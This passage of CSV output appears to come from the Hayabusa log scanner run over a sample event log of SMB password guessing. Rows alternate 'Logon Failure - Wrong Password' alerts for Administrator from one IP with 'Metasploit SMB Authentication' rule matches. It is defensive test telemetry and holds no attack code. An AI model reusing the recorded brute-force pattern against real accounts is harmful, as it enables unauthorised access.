SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0j0IBX2eZnx99n9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YIZ5Knxg0xr0WmDb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wuej3f7mEoWmd4SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: B0LcCi06ilIhFPwb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWsCGgoFmH06rRf4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP47JjNKqtYIZPsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mNlWZ9o0xf7bl2d0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnPnB2lEN3BSDpXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVMyeF9jGuzHkTHg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sDKLl3PjW2qrzJGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkllnePSq3NQ5wgC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9qLWgQnR7P9cs7s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1AdU07nzvv7RB2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cHgiB5SMiQtsl5oD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 03e7QOn36l0jH35H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DoJBywV8x8cURwrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDYGYO6s6g6Dbx8r : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nUqXpeTNePFyBmCo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2h0qJWcbzRe1GSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edsfNOovOl1Ow503 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cxCC83XLMIJrNMvl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzussOcg5ihdrnD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 55l4HKICu8x0FpQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5GmlVWDjZ75tT08G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6v1DkuFvB04PESQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTLdNb0XbzXuLi51 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSjDYb1BhHC9UTxO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1yLH19VsfLx9BGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4AVhjdz9yHsfss0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqWLOKaKwS8VBxDj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjK8A8DTSYursBzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaDCKPslwRaLBWtH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAvoekviFDSAIgBe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3XOmFwh8IamESWCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 54GbW769j1x27mrI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bZSkhwZXc1SSknDT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 05AuqlN44x7oJGoi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ4A6ReTVTcFCFeN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T7U6i4CMrL0bHouf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaeA4uZ6o8BRbzwf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MEnlL5BHmlCrtk7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNMpwAAaTsyzPfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oBtHQkRWIoq5hfn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5pkk9lgqMQ4wxQel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQVan7kRDOlnim50 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9282GqsC7UiUMbRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3lj7GjYryW9wjGgS : IP Address: 192.168.198.149 : AuthPackage: 
